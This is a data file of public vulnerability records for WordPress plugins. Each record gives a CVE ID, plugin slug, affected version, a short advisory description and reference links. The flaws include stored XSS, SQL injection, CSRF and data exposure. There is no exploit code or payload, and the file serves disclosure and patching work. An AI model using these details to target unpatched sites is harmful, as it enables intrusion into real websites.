{"CVE_ID":"CVE-2024-10797","slug":"full-screen-menu-for-elementor","versionImpact":"1.0.7","description":"The Full Screen Menu for Elementor plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 1.0.7 via the  Full Screen Menu Elementor Widget due to insufficient restrictions on which posts can be included. This makes it possible for authenticated attackers, with contributor-level access and above, to extract data from private or draft posts created with Elementor that they should not have access to.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/full-screen-menu-for-elementor\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/full-screen-menu-for-elementor\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/feb0f29c-78df-46e6-a6f4-c8548d3e5185?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/feb0f29c-78df-46e6-a6f4-c8548d3e5185?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12249","slug":"gs-instagram-portfolio","versionImpact":"1.4.5","description":"The GS Insever Portfolio plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the save_settings() function in all versions up to, and including, 1.4.5. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update the plugin's CSS settings.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gs-instagram-portfolio\\\/tags\\\/1.4.5\\\/admin\\\/Backend_Builder.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gs-instagram-portfolio\\\/tags\\\/1.4.5\\\/admin\\\/Backend_Builder.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gs-instagram-portfolio\\\/tags\\\/1.4.5\\\/admin\\\/includes\\\/Ajax.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gs-instagram-portfolio\\\/tags\\\/1.4.5\\\/admin\\\/includes\\\/Ajax.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/36f3e9be-9a4e-458d-92b3-687afc44696a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/36f3e9be-9a4e-458d-92b3-687afc44696a?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-0353","slug":"addons-for-divi","versionImpact":"4.1.0","description":"The Divi Torque Lite \u2013 Best Divi Addon, Extensions, Modules & Social Modules plugin for WordPress is vulnerable to Stored Cross-Site Scripting via several widgets in all versions up to, and including, 4.1.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addons-for-divi\\\/trunk\\\/includes\\\/modules\\\/divi-4\\\/FlipBox\\\/FlipBox.php#L1053\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addons-for-divi\\\/trunk\\\/includes\\\/modules\\\/divi-4\\\/FlipBox\\\/FlipBox.php#L1053\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addons-for-divi\\\/trunk\\\/includes\\\/modules\\\/divi-4\\\/GradientHeading\\\/GradientHeading.php#L344\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addons-for-divi\\\/trunk\\\/includes\\\/modules\\\/divi-4\\\/GradientHeading\\\/GradientHeading.php#L344\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addons-for-divi\\\/trunk\\\/includes\\\/modules\\\/divi-4\\\/ImageCarouselChild\\\/ImageCarouselChild.php#L507\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addons-for-divi\\\/trunk\\\/includes\\\/modules\\\/divi-4\\\/ImageCarouselChild\\\/ImageCarouselChild.php#L507\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addons-for-divi\\\/trunk\\\/includes\\\/modules\\\/divi-4\\\/InfoBox\\\/InfoBox.php#L852\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addons-for-divi\\\/trunk\\\/includes\\\/modules\\\/divi-4\\\/InfoBox\\\/InfoBox.php#L852\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addons-for-divi\\\/trunk\\\/includes\\\/modules\\\/divi-4\\\/InfoCard\\\/InfoCard.php#L688\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addons-for-divi\\\/trunk\\\/includes\\\/modules\\\/divi-4\\\/InfoCard\\\/InfoCard.php#L688\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addons-for-divi\\\/trunk\\\/includes\\\/modules\\\/divi-4\\\/InlineNotice\\\/InlineNotice.php#L486\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addons-for-divi\\\/trunk\\\/includes\\\/modules\\\/divi-4\\\/InlineNotice\\\/InlineNotice.php#L486\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addons-for-divi\\\/trunk\\\/includes\\\/modules\\\/divi-4\\\/LogoCarouselChild\\\/LogoCarouselChild.php#L177\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addons-for-divi\\\/trunk\\\/includes\\\/modules\\\/divi-4\\\/LogoCarouselChild\\\/LogoCarouselChild.php#L177\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addons-for-divi\\\/trunk\\\/includes\\\/modules\\\/divi-4\\\/LogoGridChild\\\/LogoGridChild.php#L193\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addons-for-divi\\\/trunk\\\/includes\\\/modules\\\/divi-4\\\/LogoGridChild\\\/LogoGridChild.php#L193\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addons-for-divi\\\/trunk\\\/includes\\\/modules\\\/divi-4\\\/Review\\\/Review.php#L703\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addons-for-divi\\\/trunk\\\/includes\\\/modules\\\/divi-4\\\/Review\\\/Review.php#L703\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addons-for-divi\\\/trunk\\\/includes\\\/modules\\\/divi-4\\\/ScrollImage\\\/ScrollImage.php#L388\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addons-for-divi\\\/trunk\\\/includes\\\/modules\\\/divi-4\\\/ScrollImage\\\/ScrollImage.php#L388\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addons-for-divi\\\/trunk\\\/includes\\\/modules\\\/divi-4\\\/Testimonial\\\/Testimonial.php#L1147\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addons-for-divi\\\/trunk\\\/includes\\\/modules\\\/divi-4\\\/Testimonial\\\/Testimonial.php#L1147\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addons-for-divi\\\/trunk\\\/includes\\\/modules\\\/divi-4\\\/VideoModal\\\/VideoModal.php#L593\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addons-for-divi\\\/trunk\\\/includes\\\/modules\\\/divi-4\\\/VideoModal\\\/VideoModal.php#L593\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3230743\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3230743\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/addons-for-divi\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/addons-for-divi\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d5810757-1866-4788-809f-2c68e16a5156?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d5810757-1866-4788-809f-2c68e16a5156?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-0820","slug":"clicface-trombi","versionImpact":"2.08","description":"The Clicface Trombi plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018nom\u2019 parameter in all versions up to, and including, 2.08 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/clicface-trombi\\\/trunk\\\/clicface-trombi.php#L80\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/clicface-trombi\\\/trunk\\\/clicface-trombi.php#L80\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/clicface-trombi\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/clicface-trombi\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1d9ff834-8a11-4ec7-9371-15d56bc84106?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1d9ff834-8a11-4ec7-9371-15d56bc84106?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2883","slug":"accept-sagepay-payments-using-contact-form-7","versionImpact":"2.0","description":"The Accept SagePay Payments Using Contact Form 7 plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.0 through the publicly accessible phpinfo.php script. This makes it possible for unauthenticated attackers to view potentially sensitive information contained in the exposed file.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/accept-sagepay-payments-using-contact-form-7\\\/trunk\\\/inc\\\/front\\\/template\\\/cfspzw-info.php#L6\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/accept-sagepay-payments-using-contact-form-7\\\/trunk\\\/inc\\\/front\\\/template\\\/cfspzw-info.php#L6\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3266837\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3266837\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/accept-sagepay-payments-using-contact-form-7\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/accept-sagepay-payments-using-contact-form-7\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ed6cbd55-0e3a-4343-9e1b-b413a132bcdd?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ed6cbd55-0e3a-4343-9e1b-b413a132bcdd?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2011","slug":"depicter","versionImpact":"3.6.1","description":"The Slider & Popup Builder by Depicter plugin for WordPress is vulnerable to generic SQL Injection via the \u2018s' parameter in all versions up to, and including, 3.6.1 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/depicter\\\/trunk\\\/app\\\/src\\\/Controllers\\\/Ajax\\\/LeadsAjaxController.php?rev=3156664#L179\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/depicter\\\/trunk\\\/app\\\/src\\\/Controllers\\\/Ajax\\\/LeadsAjaxController.php?rev=3156664#L179\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/depicter\\\/trunk\\\/app\\\/src\\\/Controllers\\\/Ajax\\\/LeadsAjaxController.php?rev=3156664#L23\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/depicter\\\/trunk\\\/app\\\/src\\\/Controllers\\\/Ajax\\\/LeadsAjaxController.php?rev=3156664#L23\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/depicter\\\/trunk\\\/app\\\/src\\\/Controllers\\\/Ajax\\\/LeadsAjaxController.php?rev=3156664#L49\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/depicter\\\/trunk\\\/app\\\/src\\\/Controllers\\\/Ajax\\\/LeadsAjaxController.php?rev=3156664#L49\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/depicter\\\/trunk\\\/app\\\/src\\\/Database\\\/Repository\\\/LeadRepository.php?rev=3156664#L224\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/depicter\\\/trunk\\\/app\\\/src\\\/Database\\\/Repository\\\/LeadRepository.php?rev=3156664#L224\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/depicter\\\/trunk\\\/app\\\/src\\\/Services\\\/LeadService.php?rev=3156664#L82\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/depicter\\\/trunk\\\/app\\\/src\\\/Services\\\/LeadService.php?rev=3156664#L82\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3287525\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3287525\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/depicter\\\/#description\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/depicter\\\/#description\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/49b36cde-39d8-4a69-8d7c-7b850b76a7cd?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/49b36cde-39d8-4a69-8d7c-7b850b76a7cd?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4189","slug":"audio-comments","versionImpact":"1.0.4","description":"The Audio Comments Plugin plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0.4. This is due to missing or incorrect nonce validation on the 'audio-comments\/audior-settings.php' page. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/audio-comments\\\/trunk\\\/audior-settings.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/audio-comments\\\/trunk\\\/audior-settings.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/89b12c36-e115-4f67-86e6-647dfc9fd25b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/89b12c36-e115-4f67-86e6-647dfc9fd25b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6201","slug":"woocommerce-google-adwords-conversion-tracking-tag","versionImpact":"1.49.0","description":"The Pixel Manager for WooCommerce \u2013 Track Conversions and Analytics, Google Ads, TikTok and more plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's conversion-pixel in all versions up to, and including, 1.49.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woocommerce-google-adwords-conversion-tracking-tag\\\/trunk\\\/includes\\\/pixels\\\/class-shortcodes.php#L289\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woocommerce-google-adwords-conversion-tracking-tag\\\/trunk\\\/includes\\\/pixels\\\/class-shortcodes.php#L289\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3313714\\\/woocommerce-google-adwords-conversion-tracking-tag\\\/trunk\\\/includes\\\/pixels\\\/class-shortcodes.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3313714\\\/woocommerce-google-adwords-conversion-tracking-tag\\\/trunk\\\/includes\\\/pixels\\\/class-shortcodes.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/woocommerce-google-adwords-conversion-tracking-tag\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/woocommerce-google-adwords-conversion-tracking-tag\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/170a4cf2-d379-4c4e-b9e5-fb3b3bd91a40?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/170a4cf2-d379-4c4e-b9e5-fb3b3bd91a40?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6831","slug":"user-registration","versionImpact":"4.2.4","description":"The User Registration plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's urcr_restrict shortcode in all versions up to, and including, 4.2.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/user-registration\\\/tags\\\/4.2.4\\\/modules\\\/content-restriction\\\/class-urcr-shortcodes.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/user-registration\\\/tags\\\/4.2.4\\\/modules\\\/content-restriction\\\/class-urcr-shortcodes.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/user-registration\\\/tags\\\/4.2.4\\\/modules\\\/content-restriction\\\/class-urcr-shortcodes.php#L147\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/user-registration\\\/tags\\\/4.2.4\\\/modules\\\/content-restriction\\\/class-urcr-shortcodes.php#L147\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3329704\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3329704\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/user-registration\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/user-registration\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/50f3e469-f788-45da-95e7-aa6da1e87fd1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/50f3e469-f788-45da-95e7-aa6da1e87fd1?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1333","slug":"unusedcss","versionImpact":"1.7.1","description":"The RapidLoad Power-Up for Autoptimize plugin for WordPress is vulnerable to unauthorized loss of data due to a missing capability check on the clear_page_cache function in versions up to, and including, 1.7.1. This makes it possible for authenticated attackers with subscriber-level access to delete the plugin's cache.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2cba74f7-7183-4297-8f04-4818c01358ef\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2cba74f7-7183-4297-8f04-4818c01358ef\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2877726\\\/unusedcss\\\/trunk\\\/includes\\\/modules\\\/unused-css\\\/UnusedCSS_Admin.php?contextall=1&old=2847136&old_path=%2Funusedcss%2Ftrunk%2Fincludes%2Fmodules%2Funused-css%2FUnusedCSS_Admin.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2877726\\\/unusedcss\\\/trunk\\\/includes\\\/modules\\\/unused-css\\\/UnusedCSS_Admin.php?contextall=1&old=2847136&old_path=%2Funusedcss%2Ftrunk%2Fincludes%2Fmodules%2Funused-css%2FUnusedCSS_Admin.php\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0280","slug":"ultimate-carousel-for-elementor","versionImpact":"2.1.7","description":"The Ultimate Carousel For Elementor WordPress plugin through 2.1.7 does not validate and escape some of its block options before outputting them back in a page\/post where the block is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/cb7ed9e6-0fa0-4ebb-9109-8f33defc8b32\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/cb7ed9e6-0fa0-4ebb-9109-8f33defc8b32\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2895","slug":"wp-easycart","versionImpact":"5.4.8","description":"The WP EasyCart plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 5.4.8. This is due to missing or incorrect nonce validation on the process_bulk_activate_product function. This makes it possible for unauthenticated attackers to bulk activate products via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/02fd8469-cd99-42dc-9a28-c0ea08512bb0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/02fd8469-cd99-42dc-9a28-c0ea08512bb0?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2917958\\\/wp-easycart\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2917958\\\/wp-easycart\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-25706","slug":"better-robots-txt","description":"Cross-Site Request Forgery (CSRF) vulnerability in Pagup WordPress Robots.Txt optimization plugin <=\u00a01.4.5 versions.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/better-robots-txt\\\/wordpress-wordpress-robots-txt-optimization-xml-sitemap-website-traffic-seo-ranking-booster-plugin-1-4-5-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/better-robots-txt\\\/wordpress-wordpress-robots-txt-optimization-xml-sitemap-website-traffic-seo-ranking-booster-plugin-1-4-5-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4915","slug":"wp-user-control","description":"The WP User Control plugin for WordPress is vulnerable to unauthorized password resets in versions up to, and including 1.5.3. This is due to the plugin using native password reset functionality, with insufficient validation on the password reset function (in the WP User Control Widget). The function changes the user's password after providing the email. The new password is only sent to the user's email, so the attacker does not have access to the new password.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f4ca1736-7b99-49db-9367-586dbc14df41?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f4ca1736-7b99-49db-9367-586dbc14df41?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-user-control\\\/tags\\\/1.5.3\\\/inc\\\/WPUserControlWidget.php#L893\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-user-control\\\/tags\\\/1.5.3\\\/inc\\\/WPUserControlWidget.php#L893\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-49170","slug":"captainform","versionImpact":"2.5.3","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in captainform Forms by CaptainForm \u2013 Form Builder for WordPress allows Reflected XSS.This issue affects Forms by CaptainForm \u2013 Form Builder for WordPress: from n\/a through 2.5.3.\n\n","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/captainform\\\/wordpress-forms-by-captainform-form-builder-for-wordpress-plugin-2-5-3-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/captainform\\\/wordpress-forms-by-captainform-form-builder-for-wordpress-plugin-2-5-3-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1710","slug":"addon-library","versionImpact":"1.3.76","description":"The Addon Library plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the onAjaxAction function action in all versions up to, and including, 1.3.76. This makes it possible for authenticated attackers, with subscriber-level access and above, to perform several unauthorized actions including uploading arbitrary files.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/15cf34d8-256b-495e-9385-a5d526bfb335?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/15cf34d8-256b-495e-9385-a5d526bfb335?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addon-library\\\/trunk\\\/inc_php\\\/unitecreator_actions.class.php#L39\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addon-library\\\/trunk\\\/inc_php\\\/unitecreator_actions.class.php#L39\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8681","slug":"premium-addons-for-elementor","versionImpact":"4.10.52","description":"The Premium Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Media Grid widget in all versions up to, and including, 4.10.52 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/de207181-0163-4222-ac16-d7b74179ff9b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/de207181-0163-4222-ac16-d7b74179ff9b?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/premium-addons-for-elementor\\\/trunk\\\/includes\\\/compatibility\\\/widgets\\\/grid.php#L72\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/premium-addons-for-elementor\\\/trunk\\\/includes\\\/compatibility\\\/widgets\\\/grid.php#L72\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/premium-addons-for-elementor\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/premium-addons-for-elementor\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/premium-addons-for-elementor\\\/trunk\\\/widgets\\\/premium-grid.php#L3033\